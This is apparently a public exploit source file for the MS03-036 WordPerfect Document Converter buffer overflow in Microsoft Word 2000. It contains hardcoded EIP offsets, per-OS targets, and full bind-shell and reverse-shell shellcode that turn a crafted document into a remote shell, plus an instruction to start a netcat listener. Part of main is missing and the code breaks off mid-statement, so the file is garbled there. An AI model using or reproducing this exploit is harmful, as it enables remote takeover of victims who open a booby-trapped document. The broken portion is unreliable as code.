Microsoft WordPerfect Document Converter Exploit (MS03-036)
|
* word.cpp + findhex.cpp (ZIP) *
/******************************************************************/
/* Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 */
/* */
/* Exploit with several targets */
/* */
/* Find your own return address with : */
/* findhex dllname FF D4 (call esp) */
/* findhex dllname FF E4 (jmp esp) */
/* */
/* Credits : */
/* vulnerability : Yuji "The Ninja" Ukai */
/* findhex : Jason Jordan */
/* sk scan-associates.net */
/* shellcode : metasploit */
/* exploit : valgasu - RstAck */
/* */
/******************************************************************/
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
/* eip offset for Word 2000 9.0.2812 */
#define EIP_OFFSET 1359
/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343
void usage(char *name)
{
printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");
printf("Usage: %s []\n\n", name);
printf("Shell type : 1 - Bind shell (need port)\n");
printf(" 2 - Reverse shell (need ip and port)\n\n");
printf("OS : 1 - Windows 2000 Pro SP3 French\n");
printf(" 2 - Windows NT4 Workstation SP5 French\n");
printf(" 3 - Windows NT4 Workstation SP6 French\n");
exit(1);
}
int main(int argc, char *argv[])
{
unsigned char bindshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x00\x00\x89\x46"
"\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x00\x89\x46\x1c"
"\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x00\x89\x46\x20"
"\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x00\x89\x46\x24"
"\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x00\x89\x46\x28"
"\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x00\x89\x46\x2c"
"\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56"
"\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x57\x57"
"\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x51\x53\xff\x56"
"\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x89\xc2\x68\x65"
"\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\xc4\xac\xff\xff"
"\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\xe2\xfd\xc6\x44"
"\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x54\x24\x4c\x89"
"\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\xff\xff\xff\xff"
"\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x00\x00\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x04\x00";
char revshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x00\x00\x89\x46"
"\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x00\x89\x46\x1c"
"\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x00\x89\x46\x20"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\xeb\x03\xff\x56"
"\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51"
"\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x00\x89\x66\x30"
"\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xe9\xeb"
"\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x5c\x24\x48"
"\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51"
"\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff"
"\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x56\x64\xa1\x30"
"\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04"
"\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78"
"\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b"
"\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01"
"\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0"
"\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";
FILE *docfile;
unsigned short port;
const char *eip;
char targetos[255];
int i;
int bshell;
if (argc %d\n", atoi(argv[4]));
}
else {
printf("-- Before document execution : nc -l -p %d\n", atoi(argv[4]));
}
return 0;
}
|